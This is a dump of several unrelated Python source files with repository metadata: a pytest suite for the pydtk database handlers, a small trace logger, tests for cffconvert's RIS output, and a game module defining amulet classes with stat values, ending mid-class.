mu = -log(datatxt[:, 18] / datatxt[:, 17])
plt.plot(datatxt[:, 0], mu)
plt.show(block=False)
| 20.666667
| 75
| 0.643548
|
794b05c140f77c80a59ac829e5fadd7bc183dedd
| 23,165
|
py
|
Python
|
test/test_db.py
|
dataware-tools/pydtk
|
1da61fb8ca90de6c39a371a9b2b65f4473932991
|
[
"Apache-2.0"
] | 11
|
2020-10-09T01:29:18.000Z
|
2022-01-21T13:21:40.000Z
|
test/test_db.py
|
dataware-tools/pydtk
|
1da61fb8ca90de6c39a371a9b2b65f4473932991
|
[
"Apache-2.0"
] | 64
|
2020-10-20T04:55:22.000Z
|
2022-01-24T15:52:32.000Z
|
test/test_db.py
|
dataware-tools/pydtk
|
1da61fb8ca90de6c39a371a9b2b65f4473932991
|
[
"Apache-2.0"
] | 1
|
2021-07-30T04:52:38.000Z
|
2021-07-30T04:52:38.000Z
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright Toolkit Authors
from typing import Optional
from pydtk.db import V4DBHandler, V4MetaDBHandler, V4DatabaseIDDBHandler
import pytest
db_args = 'db_engine,db_host,db_username,db_password'
db_list = [
('tinydb', 'test/test_v4.json', None, None),
('tinymongo', 'test/test_v4', None, None),
('montydb', 'test/test_v4', None, None),
# ('mongodb', 'host', 'username', 'password')
]
default_db_parameter = db_list[0]
def _add_data_to_db(handler: V4DBHandler):
from pydtk.models import MetaDataModel
paths = [
'test/records/sample/data/records.bag.json',
'test/records/csv_model_test/data/test.csv.json',
'test/records/json_model_test/json_test.json.json',
'test/records/forecast_model_test/forecast_test.csv.json',
'test/records/annotation_model_test/annotation_test.csv.json'
]
# Load metadata and add to DB
record_ids = set()
for path in paths:
metadata = MetaDataModel()
metadata.load(path)
record_ids.add(metadata.data['record_id'])
handler.add_data(metadata.data)
# Get DF
df = handler.df
assert len(df) == len(handler) and len(df) > 0
# Save
handler.save()
def _load_data_from_db(handler: V4DBHandler):
assert handler.count_total > 0
assert len(handler) > 0
try:
for sample in handler:
assert 'contents' in sample.keys()
assert isinstance(sample['contents'], dict)
assert len(sample['contents'].keys()) == 1
except (EOFError, StopIteration):
pass
@pytest.mark.parametrize(db_args, db_list)
def test_create_db(
db_engine: str,
db_host: str,
db_username: Optional[str],
db_password: Optional[str]
):
"""Create DB of records directory.
Args:
db_engine (str): DB engine (e.g., 'tinydb')
db_host (str): Host of path of DB
db_username (str): Username
db_password (str): Password
"""
handler = V4DBHandler(
db_class='meta',
db_engine=db_engine,
db_host=db_host,
db_username=db_username,
db_password=db_password,
base_dir_path='/opt/pydtk/test'
)
handler.read()
assert isinstance(handler, V4MetaDBHandler)
_add_data_to_db(handler)
@pytest.mark.parametrize(db_args, db_list)
def test_load_db(
db_engine: str,
db_host: str,
db_username: Optional[str],
db_password: Optional[str]
):
"""Load DB.
Args:
db_engine (str): DB engine (e.g., 'tinydb')
db_host (str): Host of path of DB
db_username (str): Username
db_password (str): Password
"""
handler = V4DBHandler(
db_class='meta',
db_engine=db_engine,
db_host=db_host,
db_username=db_username,
db_password=db_password,
base_dir_path='/opt/pydtk/test',
orient='contents'
)
handler.read()
assert isinstance(handler, V4MetaDBHandler)
_load_data_from_db(handler)
@pytest.mark.parametrize(db_args, db_list)
def test_load_database_id(
db_engine: str,
db_host: str,
db_username: Optional[str],
db_password: Optional[str]
):
"""Load DB.
Args:
db_engine (str): DB engine (e.g., 'tinydb')
db_host (str): Host of path of DB
db_username (str): Username
db_password (str): Password
"""
handler = V4DBHandler(
db_class='database_id',
db_engine=db_engine,
db_host=db_host,
db_username=db_username,
db_password=db_password,
)
handler.read()
assert isinstance(handler, V4DatabaseIDDBHandler)
assert len(handler.df) == 1
assert next(handler)['database_id'] == 'default'
@pytest.mark.parametrize(db_args, db_list)
def test_update_configs_db(
db_engine: str,
db_host: str,
db_username: Optional[str],
db_password: Optional[str]
):
"""Load DB.
Args:
db_engine (str): DB engine (e.g., 'tinydb')
db_host (str): Host of path of DB
db_username (str): Username
db_password (str): Password
"""
handler = V4DBHandler(
db_class='meta',
db_engine=db_engine,
db_host=db_host,
db_username=db_username,
db_password=db_password,
base_dir_path='/opt/pydtk/test',
orient='contents'
)
handler.read()
assert isinstance(handler, V4MetaDBHandler)
try:
handler.config.update({'_df_name': 'aaa'})
handler.config['_df_name'] = ''
raise AssertionError
except KeyError:
pass
handler.config['columns'].append({'name': 'test', 'dtype': 'str'})
handler.save()
del handler
handler = V4DBHandler(
db_class='meta',
db_engine=db_engine,
db_host=db_host,
db_username=db_username,
db_password=db_password,
base_dir_path='/opt/pydtk/test',
orient='contents'
)
handler.read()
assert handler.config['columns'][-1]['name'] == 'test'
del handler.config['columns'][-1]
handler.save()
@pytest.mark.parametrize(db_args, db_list)
def test_delete_records(
db_engine: str,
db_host: str,
db_username: Optional[str],
db_password: Optional[str]
):
"""Delete records from DB.
Args:
db_engine (str): DB engine (e.g., 'tinydb')
db_host (str): Host of path of DB
db_username (str): Username
db_password (str): Password
"""
handler = V4DBHandler(
db_class='meta',
db_engine=db_engine,
db_host=db_host,
db_username=db_username,
db_password=db_password,
base_dir_path='/opt/pydtk/test',
orient='record_id'
)
handler.read()
assert isinstance(handler, V4MetaDBHandler)
assert len(handler) == handler.count_total
num_data = len(handler)
# Remove one record without saving
handler.remove_data(next(handler))
assert len(handler) == num_data - 1
handler.read()
assert len(handler) == num_data
# Remove all data and save
try:
for sample in handler:
handler.remove_data(sample)
num_data -= 1
assert len(handler) == num_data
except (EOFError, StopIteration):
pass
assert len(handler) == 0
handler.save()
# Rollback data
_add_data_to_db(handler)
@pytest.mark.parametrize(db_args, db_list)
def test_delete_collection(
db_engine: str,
db_host: str,
db_username: Optional[str],
db_password: Optional[str]
):
"""Delete a collection from DB.
Args:
db_engine (str): DB engine (e.g., 'tinydb')
db_host (str): Host of path of DB
db_username (str): Username
db_password (str): Password
"""
handler = V4DBHandler(
db_class='database_id',
db_engine=db_engine,
db_host=db_host,
db_username=db_username,
db_password=db_password,
)
handler.read()
assert isinstance(handler, V4DatabaseIDDBHandler)
num_databases_original = len(handler)
database = next(handler)
handler.remove_data(database)
handler.save()
assert len(handler) == num_databases_original - 1
handler.read()
assert len(handler) == num_databases_original - 1
if db_engine not in ['tinydb', 'tinymongo']:
# Check if the corresponding table is deleted
meta_handler = V4DBHandler(
db_class='meta',
db_engine=db_engine,
db_host=db_host,
db_username=db_username,
db_password=db_password,
)
assert isinstance(meta_handler, V4MetaDBHandler)
assert len(meta_handler) == 0
@pytest.mark.parametrize(db_args, db_list)
def test_create_db_with_env_var(
db_engine: str,
db_host: str,
db_username: Optional[str],
db_password: Optional[str]
):
"""Create DB of records directory.
Args:
db_engine (str): DB engine (e.g., 'tinydb')
db_host (str): Host of path of DB
db_username (str): Username
db_password (str): Password
"""
import os
# Set environment variables
if db_engine is not None:
os.environ['PYDTK_META_DB_ENGINE'] = db_engine
if db_host is not None:
os.environ['PYDTK_META_DB_HOST'] = db_host
if db_username is not None:
os.environ['PYDTK_META_DB_USERNAME'] = db_username
if db_password is not None:
os.environ['PYDTK_META_DB_PASSWORD'] = db_password
handler = V4DBHandler(
db_class='meta',
base_dir_path='/opt/pydtk/test'
)
handler.read()
assert isinstance(handler, V4MetaDBHandler)
_add_data_to_db(handler)
@pytest.mark.parametrize(db_args, db_list)
def test_load_db_with_env_var(
db_engine: str,
db_host: str,
db_username: Optional[str],
db_password: Optional[str]
):
"""Load DB.
Args:
db_engine (str): DB engine (e.g., 'tinydb')
db_host (str): Host of path of DB
db_username (str): Username
db_password (str): Password
"""
import os
# Set environment variables
if db_engine is not None:
os.environ['PYDTK_META_DB_ENGINE'] = db_engine
if db_host is not None:
os.environ['PYDTK_META_DB_HOST'] = db_host
if db_username is not None:
os.environ['PYDTK_META_DB_USERNAME'] = db_username
if db_password is not None:
os.environ['PYDTK_META_DB_PASSWORD'] = db_password
handler = V4DBHandler(db_class='meta')
handler.read()
assert isinstance(handler, V4MetaDBHandler)
_load_data_from_db(handler)
@pytest.mark.parametrize(db_args, db_list)
def test_merge(
db_engine: str,
db_host: str,
db_username: Optional[str],
db_password: Optional[str]
):
"""Test merging dicts.
Args:
db_engine (str): DB engine (e.g., 'tinydb')
db_host (str): Host of path of DB
db_username (str): Username
db_password (str): Password
"""
handler = V4DBHandler(
db_class='meta',
db_engine=db_engine,
db_host=db_host,
db_username=db_username,
db_password=db_password,
base_dir_path='/opt/pydtk/test',
orient='contents',
read_on_init=False
)
data_1 = {
'record_id': 'aaa',
'string': 'test123',
'dict': {
'aaa': 'aaa'
},
'list': [
'aaa'
]
}
data_2 = {
'record_id': 'aaa',
'string': 'test123',
'dict': {
'bbb': 'bbb'
},
'list': [
'bbb'
]
}
data_merged = {
'record_id': 'aaa',
'string': 'test123',
'dict': {
'aaa': 'aaa',
'bbb': 'bbb'
},
'list': [
'aaa',
'bbb'
]
}
handler.add_data(data_1, strategy='merge')
handler.add_data(data_2, strategy='merge')
data = handler.data[0]
assert len(handler) == 1
assert all([set(data[key]) == set(data_merged[key]) for key in data_merged.keys()])
@pytest.mark.parametrize(db_args, list(filter(lambda d: d[0] in ['tinydb'], db_list)))
def test_search_tinydb(
db_engine: str,
db_host: str,
db_username: Optional[str],
db_password: Optional[str]
):
"""Search on TinyDB.
Args:
db_engine (str): DB engine (e.g., 'tinydb')
db_host (str): Host of path of DB
db_username (str): Username
db_password (str): Password
"""
from tinydb import where
handler = V4DBHandler(
db_class='meta',
db_engine=db_engine,
db_host=db_host,
db_username=db_username,
db_password=db_password,
base_dir_path='/opt/pydtk/test',
orient='contents',
read_on_init=False
)
handler.read(query=where('record_id') == 'test')
assert len(handler) > 0
handler.read(query=where('start_timestamp') < 1489728492.0)
assert len(handler) > 0
@pytest.mark.parametrize(
db_args,
list(filter(lambda d: d[0] in ['tinymongo', 'mongodb', 'montydb'], db_list))
)
def test_search_mongo(
db_engine: str,
db_host: str,
db_username: Optional[str],
db_password: Optional[str]
):
"""Search on MongoDB.
Args:
db_engine (str): DB engine (e.g., 'tinydb')
db_host (str): Host of path of DB
db_username (str): Username
db_password (str): Password
"""
handler = V4DBHandler(
db_class='meta',
db_engine=db_engine,
db_host=db_host,
db_username=db_username,
db_password=db_password,
base_dir_path='/opt/pydtk/test',
orient='contents',
read_on_init=False
)
# MongoDB-like query
handler.read(query={'record_id': 'test'})
assert len(handler) > 0
handler.read(query={'record_id': {'$regex': '016'}})
assert len(handler) > 0
handler.read(query={'record_id': {'$regex': '^016.*'}})
assert len(handler) > 0
handler.read(query={
'$and': [
{'record_id': {'$regex': '.*'}},
{'start_timestamp': {'$lt': 1489728492.0}}
]
})
assert len(handler) > 0
# Python-Query-Language (PQL)
handler.read(pql="record_id == 'test'")
assert len(handler) > 0
handler.read(pql="record_id == regex('test.*')")
assert len(handler) > 0
handler.read(query={'contents./points_concat_downsampled': {'$exists': True}})
assert len(handler) > 0
handler.read(pql='"contents./points_concat_downsampled" == exists(True)')
assert len(handler) > 0
handler.read(pql="start_timestamp > 1500000000.0")
assert len(handler) > 0
handler.read(
pql='start_timestamp > 1400000000.0 '
'and "contents./points_concat_downsampled" == exists(True)'
)
assert len(handler) > 0
@pytest.mark.parametrize(db_args, list(filter(lambda d: d[0] in ['mongodb'], db_list)))
def test_group_by_mongo(
db_engine: str,
db_host: str,
db_username: Optional[str],
db_password: Optional[str]
):
"""Evaluate Group-by on MongoDB.
Args:
db_engine (str): DB engine (e.g., 'tinydb')
db_host (str): Host of path of DB
db_username (str): Username
db_password (str): Password
"""
handler = V4DBHandler(
db_class='meta',
db_engine=db_engine,
db_host=db_host,
db_username=db_username,
db_password=db_password,
base_dir_path='/opt/pydtk/test',
orient='contents',
read_on_init=False
)
handler.read()
group_keys = ['database_id', 'record_id', 'content_type', 'data_type']
all = {k: [data[k] for data in handler.data] for k in group_keys}
for key in group_keys:
handler.read(group_by=key)
grouped = [data[key] for data in handler.data]
assert len(grouped) == len(set(all[key])), 'AssertionError: group_key: {}'.format(key)
@pytest.mark.parametrize(
db_args,
list(filter(lambda d: d[0] in ['mongodb', 'montydb'], db_list))
)
def test_limit_mongo(
db_engine: str,
db_host: str,
db_username: Optional[str],
db_password: Optional[str]
):
"""Test for limit.
Args:
db_engine (str): DB engine (e.g., 'tinydb')
db_host (str): Host of path of DB
db_username (str): Username
db_password (str): Password
"""
handler = V4DBHandler(
db_class='meta',
db_engine=db_engine,
db_host=db_host,
db_username=db_username,
db_password=db_password,
base_dir_path='/opt/pydtk/test',
orient='file',
read_on_init=False
)
handler.read(limit=1)
assert len(handler) == 1
handler.read(limit=2)
assert len(handler) == 2
@pytest.mark.parametrize(db_args, db_list)
def test_add_columns(
db_engine: str,
db_host: str,
db_username: Optional[str],
db_password: Optional[str]
):
"""Add columns to DB.
Args:
db_engine (str): DB engine (e.g., 'tinydb')
db_host (str): Host of path of DB
db_username (str): Username
db_password (str): Password
"""
handler = V4DBHandler(
db_class='meta',
db_engine=db_engine,
db_host=db_host,
db_username=db_username,
db_password=db_password,
base_dir_path='/opt/pydtk/test',
orient='contents'
)
assert isinstance(handler, V4MetaDBHandler)
data = {
'key-int': int(0),
'key-float': float(0.0),
'key-str': 'str',
'key-dict': {
'abc': 'def'
}
}
handler.add_data(data)
for key in ['key-int', 'key-float', 'key-str', 'key-dict']:
assert key in [c['name'] for c in handler.config['columns']]
assert next(filter(lambda c: c['name'] == key, handler.config['columns']))['dtype'] \
== type(data[key]).__name__ # noqa: E721
handler.save()
handler.read()
for key in ['key-int', 'key-float', 'key-str', 'key-dict']:
assert key in [c['name'] for c in handler.config['columns']]
assert next(filter(lambda c: c['name'] == key, handler.config['columns']))['dtype'] \
== type(data[key]).__name__ # noqa: E721
handler.remove_data(data)
handler.save()
@pytest.mark.parametrize(db_args, db_list)
def test_display_name(
db_engine: str,
db_host: str,
db_username: Optional[str],
db_password: Optional[str]
):
"""Test for display_name in configs.
Args:
db_engine (str): DB engine (e.g., 'tinydb')
db_host (str): Host of path of DB
db_username (str): Username
db_password (str): Password
"""
handler = V4DBHandler(
db_class='meta',
db_engine=db_engine,
db_host=db_host,
db_username=db_username,
db_password=db_password,
base_dir_path='/opt/pydtk/test',
orient='path'
)
assert isinstance(handler, V4MetaDBHandler)
reserved_names = ['_id', '_uuid', '_creation_time']
names = [c for c in handler.columns if c not in reserved_names]
display_names = [c for c in handler.df.columns.tolist() if c not in reserved_names]
assert all([n in [c['name'] for c in handler.config['columns']] for n in names])
assert all([n in [c['display_name'] for c in handler.config['columns']] for n in display_names])
@pytest.mark.parametrize(db_args, db_list)
def test_read_with_offset(
db_engine: str,
db_host: str,
db_username: Optional[str],
db_password: Optional[str]
):
"""Test for reading database with offset.
Args:
db_engine (str): DB engine (e.g., 'tinydb')
db_host (str): Host of path of DB
db_username (str): Username
db_password (str): Password
"""
handler = V4DBHandler(
db_class='meta',
db_engine=db_engine,
db_host=db_host,
db_username=db_username,
db_password=db_password,
base_dir_path='/opt/pydtk/test',
orient='path'
)
assert isinstance(handler, V4MetaDBHandler)
handler.read(offset=0)
assert handler.df.index[0] == 0
handler.read(offset=1)
assert handler.df.index[0] == 1
handler.read(offset=1, limit=1)
assert handler.df.index[0] == 1
@pytest.mark.parametrize(db_args, db_list)
def test_db_handler_dtype(
db_engine: str,
db_host: str,
db_username: Optional[str],
db_password: Optional[str]
):
"""Test for checking data-types handled by DBHandler.
Args:
db_engine (str): DB engine (e.g., 'tinydb')
db_host (str): Host of path of DB
db_username (str): Username
db_password (str): Password
"""
from pydtk.db import DBHandler
handler = DBHandler(db_class='meta')
handler.add_data({
'record_id': 1,
'path': 'abc',
'contents': {},
'new_column_str': '',
'new_column_int': 1,
'new_column_float': 1.234,
'new_column_list': [],
'new_column_dict': {}
})
assert isinstance(handler.data[0]['record_id'], str)
assert isinstance(handler.data[0]['path'], str)
assert isinstance(handler.data[0]['contents'], dict)
assert isinstance(handler.data[0]['new_column_str'], str)
assert isinstance(handler.data[0]['new_column_int'], int)
assert isinstance(handler.data[0]['new_column_float'], float)
assert isinstance(handler.data[0]['new_column_list'], list)
assert isinstance(handler.data[0]['new_column_dict'], dict)
handler.save()
handler = DBHandler(db_class='meta')
handler.read(pql='"record_id" == regex(".*")')
assert len(handler) > 0
@pytest.mark.parametrize(
db_args, list(filter(lambda d: d[0] in ['mongodb', 'montydb'], db_list))
)
def test_remove_database_id(
db_engine: str,
db_host: str,
db_username: Optional[str],
db_password: Optional[str]
):
"""Test `drop_table` function."""
from pydtk.db import DBHandler
# Create a database with database-id 'pytest'
handler = DBHandler(
db_class='meta',
db_engine=db_engine,
db_host=db_host,
db_username=db_username,
db_password=db_password,
base_dir_path='/opt/pydtk/test',
database_id='pytest'
)
_add_data_to_db(handler)
# Load database-id handler
handler = DBHandler(
db_class='database_id',
db_engine=db_engine,
db_host=db_host,
db_username=db_username,
db_password=db_password,
)
handler.read()
assert len(list(filter(lambda x: x['database_id'] == 'pytest', handler.data))) > 0
# Remove database-id 'pytest' (in-memory)
database_info_to_remove = next(filter(lambda x: x['database_id'] == 'pytest', handler.data))
handler.remove_data(database_info_to_remove)
# Make sure that no resources are changed on the remote DB
_handler = DBHandler(
db_class='database_id',
db_engine=db_engine,
db_host=db_host,
db_username=db_username,
db_password=db_password,
)
_handler.read()
assert len(list(filter(lambda x: x['database_id'] == 'pytest', _handler.data))) > 0
_metadata_handler = DBHandler(
db_class='meta',
db_engine=db_engine,
db_host=db_host,
db_username=db_username,
db_password=db_password,
base_dir_path='/opt/pydtk/test',
database_id='pytest'
)
_metadata_handler.read()
assert len(_handler) > 0
# Reflect the removal of database-id 'pytest' to the remote DB
handler.save()
# Confirm that the resources are removed on the remote DB
_handler.read()
assert len(list(filter(lambda x: x['database_id'] == 'pytest', _handler.data))) == 0
_metadata_handler.read()
assert len(_metadata_handler) == 0
if __name__ == '__main__':
test_create_db(*default_db_parameter)
test_load_db(*default_db_parameter)
test_create_db_with_env_var(*default_db_parameter)
test_load_db_with_env_var(*default_db_parameter)
test_merge(*default_db_parameter)
test_search_tinydb()
test_search_mongo(*next(filter(lambda d: d[0] in ['tinymongo'], db_list)))
| 27.093567
| 100
| 0.618347
|
794b06e54025ab6e2d05c25eb7a26179f5454026
| 1,783
|
py
|
Python
|
python/itypes/log/trace_logger.py
|
eddy-ilg/itypes
|
eaf1c4a86576c77caa34148c0fdc6b2e012119ff
|
[
"MIT"
] | null | null | null |
python/itypes/log/trace_logger.py
|
eddy-ilg/itypes
|
eaf1c4a86576c77caa34148c0fdc6b2e012119ff
|
[
"MIT"
] | null | null | null |
python/itypes/log/trace_logger.py
|
eddy-ilg/itypes
|
eaf1c4a86576c77caa34148c0fdc6b2e012119ff
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
import sys
import inspect
from itypes import addr
TRACE = -1
DEBUG = 0
INFO = 1
WARNING = 2
ERROR = 3
log_level = INFO
def set_trace_level(level):
global log_level
if isinstance(level, str):
level = str_to_level(level)
log_level = level
def str_to_level(str):
if str == "TRACE": return TRACE
if str == "DEBUG": return DEBUG
if str == "INFO": return INFO
if str == "WARNING": return WARNING
if str == "ERROR": return ERROR
raise KeyError(str)
def level_to_str(level):
if level == TRACE: return "TRACE"
if level == DEBUG: return "DEBUG"
if level == INFO: return "INFO"
if level == WARNING: return "WARNING"
if level == ERROR: return "ERROR"
return "(unknown)"
class TraceLogger:
def __init__(self):
info = inspect.stack()[1]
self._container = info.frame.f_locals["__class__"]
self._module_name = self._container.__module__
self._class_name = self._container.__name__
def _message(self, level, message):
global log_level
if level < log_level:
return
info = inspect.stack()[2]
object = info.frame.f_locals["self"]
function_name = info.function
str = ""
str += f"[{level_to_str(level):>7s}] {self._module_name:40s} {self._class_name:25s} {addr(object):14s} {function_name+'()':30s}: {message}"
str += "\n"
sys.stdout.write(str)
sys.stdout.flush()
def info(self, msg):
self._message(INFO, msg)
def debug(self, msg):
self._message(DEBUG, msg)
def trace(self, msg):
self._message(TRACE, msg)
def error(self, msg):
self._message(ERROR, msg)
def warning(self, msg):
self._message(WARNING, msg)
| 24.094595
| 147
| 0.614694
|
794b07dbb77fee62e63f2d12b108154ddc1a8fda
| 1,742
|
py
|
Python
|
test/1.1.0/08/test_1_1_0__08_ris_object.py
|
zmoon/cff-converter-python
|
ebf0b5e44d67f8beaa1cd13a0d0393ea04c6058d
|
[
"Apache-2.0"
] | 40
|
2018-06-13T21:38:35.000Z
|
2022-03-19T18:34:37.000Z
|
test/1.1.0/08/test_1_1_0__08_ris_object.py
|
zmoon/cff-converter-python
|
ebf0b5e44d67f8beaa1cd13a0d0393ea04c6058d
|
[
"Apache-2.0"
] | 135
|
2018-03-20T09:35:39.000Z
|
2022-03-16T14:57:08.000Z
|
test/1.1.0/08/test_1_1_0__08_ris_object.py
|
zmoon/cff-converter-python
|
ebf0b5e44d67f8beaa1cd13a0d0393ea04c6058d
|
[
"Apache-2.0"
] | 14
|
2018-06-12T20:17:25.000Z
|
2022-02-02T13:58:58.000Z
|
import os
import pytest
from test.contracts.ris_object import Contract
from cffconvert.behavior_1_1_x.ris_object import RisObject
from cffconvert import Citation
@pytest.fixture(scope="module")
def ris_object():
fixture = os.path.join(os.path.dirname(__file__), "CITATION.cff")
with open(fixture, "rt", encoding="utf-8") as f:
cffstr = f.read()
citation = Citation(cffstr)
return RisObject(citation.cffobj, initialize_empty=True)
class TestRisObject(Contract):
def test_abstract(self, ris_object):
assert ris_object.add_abstract().abstract is None
def test_as_string(self, ris_object):
actual_ris = ris_object.add_all().as_string()
fixture = os.path.join(os.path.dirname(__file__), "ris.txt")
with open(fixture, "rt", encoding="utf-8") as f:
expected_ris = f.read()
assert actual_ris == expected_ris
def test_author(self, ris_object):
assert ris_object.add_author().author == 'AU - Van Zandt, Steven\nAU - van Zandt, Steven\n'
def test_check_cffobj(self, ris_object):
ris_object.check_cffobj()
# doesn't need an assert
def test_date(self, ris_object):
assert ris_object.add_date().date == 'DA - 2018-01-16\n'
def test_doi(self, ris_object):
assert ris_object.add_doi().doi is None
def test_keywords(self, ris_object):
assert ris_object.add_keywords().keywords is None
def test_title(self, ris_object):
assert ris_object.add_title().title == 'TI - cff-converter-python\n'
def test_url(self, ris_object):
assert ris_object.add_url().url is None
def test_year(self, ris_object):
assert ris_object.add_year().year == 'PY - 2018\n'
| 32.867925
| 101
| 0.680827
|
794b082fb05e1f17061f33978e6746f059f48226
| 8,930
|
py
|
Python
|
slot/a/all.py
|
pfleg/dl
|
0566bd5cac32feea7dfd082b199a44b05e8e1e04
|
[
"Apache-2.0"
] | null | null | null |
slot/a/all.py
|
pfleg/dl
|
0566bd5cac32feea7dfd082b199a44b05e8e1e04
|
[
"Apache-2.0"
] | null | null | null |
slot/a/all.py
|
pfleg/dl
|
0566bd5cac32feea7dfd082b199a44b05e8e1e04
|
[
"Apache-2.0"
] | null | null | null |
from slot.a import Amulet, Conf
class Plunder_Pals(Amulet): #Plunder Pals or Hitting the Books
att = 54
a = [('s',0.30)]
PP = Plunder_Pals
class Resounding_Rendition(Amulet):
att = 64
a = [('s',0.30),
('cc',0.08,'hp70')]
RR = Resounding_Rendition
class Crystalian_Envoy(Amulet):
att = 57
a = [('a',0.13,'hp70')]
CE = Crystalian_Envoy
class Bonds_Between_Worlds(Amulet):
att = 54
a = [('a',0.13,'hp70'),
('prep',25)]
Bonds = Bonds_Between_Worlds
BBW = Bonds_Between_Worlds
class Levins_Champion(Amulet):
att = 64
a = [('cd',0.15),
('cc',0.10,'hp70')]
LC = Levins_Champion
class Valiant_Crown(Amulet):
att = 65
a = [('s',0.30),
('bc',0.10)]
VC = Valiant_Crown
class Tough_Love(Amulet):
att = 65
a = [('s',0.25),
('lo',0.50)]
TL = Tough_Love
class Flash_of_Genius(Amulet): # Flash of Genius
att = 57
a = [('a',0.20,'hit15')]
FG = Flash_of_Genius
FoG = Flash_of_Genius
class Fresh_Perspective(Amulet):
att = 52
a = [('fs',0.40),
('s',0.20)]
FP = Fresh_Perspective
#class Together_We_Stand(Amulet):
# att = 52
# a = [('sts',0.05),
# ('s',0.20)]
class FirstRate_Hospitality(Amulet):
att = 55
a = [('a',0.08,'hp70'),
('bc',0.10)]
FRH = FirstRate_Hospitality
class The_Bustling_Hut(Amulet):
att = 50
a = [('bc',0.08), ('sp',0.07,'light')]
class Jewels_of_the_Sun(Amulet):
att = 64
a = [('sp',0.08),
('a',0.10,'hp70')]
JotS = Jewels_of_the_Sun
class United_by_One_Vision(Amulet):
att = 54
a = [('sp',0.08),
('a',0.13,'hp70')]
class Heralds_of_Hinomoto(Amulet):
att = 64
a = [('s',0.30),
('sp',0.06)]
HoH = Heralds_of_Hinomoto
HH = Heralds_of_Hinomoto
class One_with_the_Shadows(Amulet):
att = 51
a = [('cc',0.06),
('bk',0.20)]
class Flower_in_the_Fray(Amulet):
att = 52
a = [('cd',0.15),
('s',0.20)]
FitF = Flower_in_the_Fray
class The_Prince_of_Dragonyule(Amulet):
att = 63
a = [('cd',0.20), ('cc',0.12,'water_hit15')]
class Evening_of_Luxury(Amulet):
att = 65
a = [('a',0.15,'hp100'),
('cd',0.15)]
EoL = Evening_of_Luxury
class Seaside_Princess(Amulet):
att = 65
a = [('a',0.15,'hp100'),
('cd',0.22,'hp100')]
SSP = Seaside_Princess
class The_Chocolatiers(Amulet):
att = 62
a = [('prep',100)]
Choco = The_Chocolatiers
class Worthy_Rivals(Amulet):
att = 64
a = [('bk',0.30),
('prep',25)]
class Lord_of_the_Skies(Amulet):
att = 46
a = [('od',0.10)]
class Witchs_Kitchen(Amulet):
att = 57
a = [('s',0.40,'hp100'),
('resist',50,'blind')]
class Silke_Lends_a_Hand(Amulet):
att = 42
a = [('s',0.20),
('resist',50,'blind')]
class Saintly_Delivery(Amulet):
att = 42
a = [('s',0.20),
('resist',50,'stun')]
class Luck_of_the_Draw(Amulet):
att = 33
a = [('resist',25,'paralysis'), ('bt',0.25,'shadow')]
class Lunar_Festivities(Amulet):
att = 51
a = [('fs',0.40),
('sp',0.10,'fs')]
class The_Warrioresses(Amulet):
att = 52
a = [('fs',0.40),
('cd',0.13)]
class Stellar_Show(Amulet):
att = 65
a = [('fs',0.50),
('cd',0.15)]
SS = Stellar_Show
class Kung_Fu_Masters(Amulet):
att = 64
a = [('s',0.20), ('cc',0.14,'axe')]
KFM = Kung_Fu_Masters
class Forest_Bonds(Amulet):
att = 64
a = [('sp',0.12,'fs'), ('s',0.40,'bow')]
FB = Forest_Bonds
class Dragon_and_Tamer(Amulet):
att = 57
a = [('s',0.40, 'lance')]
DnT = Dragon_and_Tamer
class Twinfold_Bonds(Amulet):
att = 65
a = [('a',0.15,'hit15'), ('s',0.40,'dagger')]
TB = Twinfold_Bonds
class Summer_Paladyns(Amulet):
att = 64
a = [('s',0.40, 'axe'), ('bc_energy', 1)]
class The_Shining_Overlord(Amulet):
att = 65
a = [('dc', 3), ('s',0.40,'sword')]
TSO = The_Shining_Overlord
class Halidom_Grooms(Amulet):
att = 50
a = [('bt',0.2), ('bc_energy', 1)]
HG = Halidom_Grooms
class Beach_Battle(Amulet):
att = 50
a = [('bt',0.2), ('sp',0.07,'water')]
BB = Beach_Battle
class The_Petal_Queen(Amulet):
att = 53
a = [('eprep', 5)]
class Hanetsuki_Rally(Amulet):
att = 51
a = [('cc',0.05),('lo',0.4)]
HR = Hanetsuki_Rally
class Indelible_Summer(Amulet):
att = 52
a = [('sp',0.09,'water')]
IS = Indelible_Summer
class Sisters_Day_Out(Amulet):
att = 64
a = [('fs',0.40), ('fsprep', 3, 0.25)]
SDO = Sisters_Day_Out
class Elegant_Escort(Amulet):
att = 54
a = [('k_burn',0.3)]
EE = Elegant_Escort
class Beautiful_Nothingness(Amulet):
att = 52
a = [('a',0.10,'hp70'),('cc',0.05)]
BN = Beautiful_Nothingness
class Castle_Cheer_Corps(Amulet):
att = 64
a = [('sp',0.06), ('fsprep', 3, 0.25)]
CCC = Castle_Cheer_Corps
class Honest_Repose(Amulet):
att = 53
a = [('sp', 10, 'flame')]
class High_Dragon_WP(Amulet):
att = 39
class Taiko_Tandem(Amulet):
att = 50
a = [('ecombo', 30), ('prep', 0.20)]
class Candy_Couriers(Amulet):
att = 65
a = [('bk',0.25), ('s',0.40,'wand')]
CC = Candy_Couriers
class From_Whence_He_Comes(Amulet):
att = 50
a = [('bt',0.2),
('prep',0.25)]
FWHC = From_Whence_He_Comes
class Dear_Diary(Amulet):
att = 65
a = [('ro', 0.10), ('cc',0.14,'bow')]
DD = Dear_Diary
class Dear_Diary_RO_30(Amulet):
att = 65
a = [('ro', 0.1, 30), ('cc',0.14,'bow')]
class Dear_Diary_RO_60(Amulet):
att = 65
a = [('ro', 0.1, 60), ('cc',0.14,'bow')]
class Dear_Diary_RO_90(Amulet):
att = 65
a = [('ro', 0.1, 90), ('cc',0.14,'bow')]
class Odd_Sparrows(Amulet):
att = 51
a = [('bc',0.8)]
OS = Odd_Sparrows
class Mega_Friends(Amulet):
att = 55
a = [('s',0.3),('fs',0.40)]
MF = Mega_Friends
class Wily_Warriors_Flash_and_Heat(Amulet):
att = 53
a = [('sp',0.08),('sp',0.12,'fs')]
WWFH = Wily_Warriors_Flash_and_Heat
class Wily_Warriors_Bubble_and_Wood(Amulet):
att = 54
a = [('a', 0.13, 'hp70')]
class Wily_Warriors_Air_and_Crash(Amulet):
att = 49
a = [('a', 0.2, 'hit15')]
class Howling_to_the_Heavens(Amulet):
att = 65
a = [('cd',0.20), ('cc',0.12,'shadow_hit15')]
HttH = Howling_to_the_Heavens
class Spirit_of_the_Season(Amulet):
att = 65
a = [('a',0.15,'hp100'),('k_paralysis',0.2)]
SotS = Spirit_of_the_Season
class The_Wyrmclan_Duo(Amulet):
att = 65
